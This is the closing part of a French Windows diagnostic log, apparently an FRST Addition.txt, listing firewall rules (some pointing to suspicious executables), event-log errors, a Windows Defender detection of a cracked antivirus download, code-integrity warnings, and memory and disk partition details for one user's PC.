(x86)\CodeMeter\Runtime\bin\CodeMeter.exe FirewallRules: [{47880F28-D7F1-40AC-B251-A6BBC3C65C6D}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{D7995ADA-E544-4B59-848F-CB13E72A1040}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{BCD5C56B-674B-48A5-8FA0-587440E7C911}] => (Allow) C:\Program Files (x86)\Mobogenie3\mobogenieP2sp.exe FirewallRules: [{3ADD2B11-9E6F-4387-ABF1-96DC9E9529DC}] => (Allow) C:\Program Files (x86)\Mobogenie3\mobogenieP2sp.exe FirewallRules: [{43DBEE7D-2B27-4461-8688-8DBB98F8A937}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{A17ED3C5-35BE-4BAD-A028-A2B6A485E631}] => (Allow) C:\Users\dali\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe FirewallRules: [{2D0EE9BC-522E-42CE-BCAD-1C70792BCB52}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Youtomato\YT Downloader\YTDownloader.exe] => Enabled:YT Downloader ==================== Points de restauration ========================= 23-10-2018 08:53:08 Windows Update 26-10-2018 11:03:04 Windows Update ==================== Éléments en erreur du Gestionnaire de périphériques ============= ==================== Erreurs du Journal des événements: ========================= Erreurs Application: ================== Error: (10/16/2018 01:33:38 PM) (Source: VistaBootPRO) (EventID: 1010) (User: ) Description: VistaBootPRO detected an error while attempting to run the following command: /set {default} description "Avid" Error: (10/16/2018 01:33:37 PM) (Source: VistaBootPRO) (EventID: 1008) (User: ) Description: VistaBootPRO detected an error while attempting to run the following command: /timeout 0 L?op‚ration a r‚ussi. Error: (10/16/2018 01:33:23 PM) (Source: Windows Backup) (EventID: 4103) (User: ) Description: La sauvegarde a échoué en raison d’une erreur d’écriture dans l’emplacement de sauvegarde, E:\. Erreur : Emplacement de sauvegarde introuvable ou incorrect. Vérifiez vos paramètres de sauvegarde, ainsi que l’emplacement de sauvegarde. (0x81000006). Error: (10/16/2018 01:31:35 PM) (Source: VistaBootPRO) (EventID: 1010) (User: ) Description: VistaBootPRO detected an error while attempting to run the following command: /set {8d517498-5588-11e6-bc8e-e165183ff9c7} description "Windows 7." Error: (10/16/2018 01:31:23 PM) (Source: VistaBootPRO) (EventID: 1009) (User: ) Description: VistaBootPRO detected an error while attempting to run the following command: /default {8d517498-5588-11e6-bc8e-e165183ff9c7} Error: (10/16/2018 01:31:21 PM) (Source: VistaBootPRO) (EventID: 1008) (User: ) Description: VistaBootPRO detected an error while attempting to run the following command: /timeout 0 L?op‚ration a r‚ussi. Error: (10/16/2018 01:30:58 PM) (Source: VistaBootPRO) (EventID: 1010) (User: ) Description: VistaBootPRO detected an error while attempting to run the following command: /set {current} description "Windows 7" Error: (10/16/2018 01:30:57 PM) (Source: VistaBootPRO) (EventID: 1008) (User: ) Description: VistaBootPRO detected an error while attempting to run the following command: /timeout 0 L?op‚ration a r‚ussi. Erreurs système: ============= Error: (10/27/2018 11:41:53 AM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Le service NVIDIA Stereoscopic 3D Driver Service s’est terminé de façon inattendue pour la 1ème fois. Error: (10/27/2018 11:40:58 AM) (Source: NetBT) (EventID: 4321) (User: ) Description: Le nom "DALI-PC :20" n’a pas pu être enregistré sur l’interface avec l’adresse IP 10.10.10.240. L’ordinateur avec l’adresse IP 10.10.10.42 n’a pas permis que le nom soit réclamé par cet ordinateur. Error: (10/27/2018 11:40:58 AM) (Source: Server) (EventID: 2505) (User: ) Description: Le serveur n’a pas pu se lier au transport \Device\NetBT_Tcpip_{DCBD59AF-1131-4969-80A6-2316690A532C} car un autre ordinateur du réseau porte le même nom. Le serveur n’a pas pu démarrer. Error: (10/27/2018 11:40:55 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Le service VMware USB Arbitration Service n’a pas pu démarrer en raison de l’erreur : Le fichier spécifié est introuvable. Error: (10/27/2018 11:40:55 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Le service xifs n’a pas pu démarrer en raison de l’erreur : Le fichier spécifié est introuvable. Error: (10/27/2018 11:40:45 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Le service BrPar n’a pas pu démarrer en raison de l’erreur : Le chargement du pilote a été bloqué Error: (10/27/2018 11:40:44 AM) (Source: Application Popup) (EventID: 1060) (User: ) Description: Le chargement de \SystemRoot\SysWow64\drivers\BrPar.sys a été bloqué en raison d’une incompatibilité avec ce système. Contactez l’éditeur de votre logiciel pour obtenir une version compatible du pilote. Error: (10/27/2018 11:40:44 AM) (Source: NetBT) (EventID: 4321) (User: ) Description: Le nom "DALI-PC :0" n’a pas pu être enregistré sur l’interface avec l’adresse IP 10.10.10.240. L’ordinateur avec l’adresse IP 10.10.10.42 n’a pas permis que le nom soit réclamé par cet ordinateur. Windows Defender: =================================== Date: 2016-09-01 14:40:21.797 Description: L’analyse Windows Defender a détecté un logiciel espion ou un autre logiciel potentiellement indésirable. Pour plus d’informations, consultez les informations suivantes : http://go.microsoft.com/fwlink/?linkid=37020&name=Program:Win32/Hadsruda!bit&threatid=213971 Nom : Program:Win32/Hadsruda!bit ID : 213971 Gravité : Moyenne Catégorie : Logiciel potentiellement non désiré Chemin d’accès trouvé : file:C:\Users\dali\AppData\Local\Temp\Rar$EX00.958\ESET NOD32 Antivirus 7 (32-bit and 64-bit) + Keys.exe;process:pid:4460 Type de détection : Concret Source de détection : Protection en temps réel Etat : Inconnu Utilisateur : \ Nom du processus : Date: 2016-09-01 14:40:20.686 Description: L’analyse Windows Defender a détecté un logiciel espion ou un autre logiciel potentiellement indésirable. Pour plus d’informations, consultez les informations suivantes : http://go.microsoft.com/fwlink/?linkid=37020&name=Program:Win32/Hadsruda!bit&threatid=213971 Nom : Program:Win32/Hadsruda!bit ID : 213971 Gravité : Moyenne Catégorie : Logiciel potentiellement non désiré Chemin d’accès trouvé : file:C:\Users\dali\AppData\Local\Temp\Rar$EX00.958\ESET NOD32 Antivirus 7 (32-bit and 64-bit) + Keys.exe Type de détection : Concret Source de détection : Protection en temps réel Etat : Inconnu Utilisateur : \ Nom du processus : CodeIntegrity: =================================== Date: 2017-02-01 14:22:26.339 Description: Windows ne peut pas vérifier l’intégrité d’image du fichier \Device\HarddiskVolume1\Users\dali\AppData\Local\Temp\EverestDriver.sys, car le fichier à hacher est introuvable sur le système. Une modification matérielle ou logicielle récente a peut-être installé un fichier incorrectement signé ou endommagé ou il s’agit éventuellement d’un logiciel malveillant d’une source inconnue. Date: 2017-02-01 14:22:26.323 Description: Windows ne peut pas vérifier l’intégrité d’image du fichier \Device\HarddiskVolume1\Users\dali\AppData\Local\Temp\EverestDriver.sys, car le fichier à hacher est introuvable sur le système. Une modification matérielle ou logicielle récente a peut-être installé un fichier incorrectement signé ou endommagé ou il s’agit éventuellement d’un logiciel malveillant d’une source inconnue. Date: 2017-02-01 14:22:25.980 Description: Windows ne peut pas vérifier l’intégrité d’image du fichier \Device\HarddiskVolume1\Program Files (x86)\Lavalys\EVEREST Home Edition\kerneld.amd64, car le fichier à hacher est introuvable sur le système. Une modification matérielle ou logicielle récente a peut-être installé un fichier incorrectement signé ou endommagé ou il s’agit éventuellement d’un logiciel malveillant d’une source inconnue. Date: 2017-02-01 14:22:25.980 Description: Windows ne peut pas vérifier l’intégrité d’image du fichier \Device\HarddiskVolume1\Program Files (x86)\Lavalys\EVEREST Home Edition\kerneld.amd64, car le fichier à hacher est introuvable sur le système. Une modification matérielle ou logicielle récente a peut-être installé un fichier incorrectement signé ou endommagé ou il s’agit éventuellement d’un logiciel malveillant d’une source inconnue. Date: 2017-12-09 11:35:11.997 Description: Windows ne peut pas vérifier l’intégrité d’image du fichier \Device\HarddiskVolume1\Program Files\Perfect Uninstaller\FKFAP.sys, car le fichier à hacher est introuvable sur le système. Une modification matérielle ou logicielle récente a peut-être installé un fichier incorrectement signé ou endommagé ou il s’agit éventuellement d’un logiciel malveillant d’une source inconnue. Date: 2017-12-09 11:35:11.981 Description: Windows ne peut pas vérifier l’intégrité d’image du fichier \Device\HarddiskVolume1\Program Files\Perfect Uninstaller\FKFAP.sys, car le fichier à hacher est introuvable sur le système. Une modification matérielle ou logicielle récente a peut-être installé un fichier incorrectement signé ou endommagé ou il s’agit éventuellement d’un logiciel malveillant d’une source inconnue. Date: 2017-12-09 11:35:11.856 Description: Windows ne peut pas vérifier l’intégrité d’image du fichier \Device\HarddiskVolume1\Program Files\Perfect Uninstaller\FKFAP.sys, car le fichier à hacher est introuvable sur le système. Une modification matérielle ou logicielle récente a peut-être installé un fichier incorrectement signé ou endommagé ou il s’agit éventuellement d’un logiciel malveillant d’une source inconnue. Date: 2017-12-09 11:35:11.841 Description: Windows ne peut pas vérifier l’intégrité d’image du fichier \Device\HarddiskVolume1\Program Files\Perfect Uninstaller\FKFAP.sys, car le fichier à hacher est introuvable sur le système. Une modification matérielle ou logicielle récente a peut-être installé un fichier incorrectement signé ou endommagé ou il s’agit éventuellement d’un logiciel malveillant d’une source inconnue. ==================== Infos Mémoire =========================== Processeur: Intel(R) Core(TM) i3-4160 CPU @ 3.60GHz Pourcentage de mémoire utilisée: 37% Mémoire physique - RAM - totale: 6085.83 MB Mémoire physique - RAM - disponible: 3811.02 MB Mémoire virtuelle totale: 12169.8 MB Mémoire virtuelle disponible: 9760.39 MB ==================== Lecteurs ================================ Drive c: () (Fixed) (Total:74.12 GB) (Free:40.32 GB) NTFS ==>[lecteur avec composants d'amorçage (obtenu depuis BCD)] Drive d: () (Fixed) (Total:120.01 GB) (Free:60.27 GB) NTFS Drive e: () (Fixed) (Total:84.69 GB) (Free:83.03 GB) NTFS Drive g: () (Fixed) (Total:186.94 GB) (Free:147.44 GB) NTFS Drive h: (programmes) (Fixed) (Total:338.13 GB) (Free:269.02 GB) NTFS Drive i: (dali) (Fixed) (Total:593.37 GB) (Free:376.55 GB) NTFS ==================== MBR & Table des partitions ================== ======================================================== Disk: 0 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: 97BE5B6A) Partition 1: (Active) - (Size=74.1 GB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=391.6 GB) - (Type=0F Extended) ======================================================== Disk: 1 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 4523E66A) Partition 1: (Not Active) - (Size=338.1 GB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=593.4 GB) - (Type=07 NTFS) ==================== Fin de Addition.txt ============================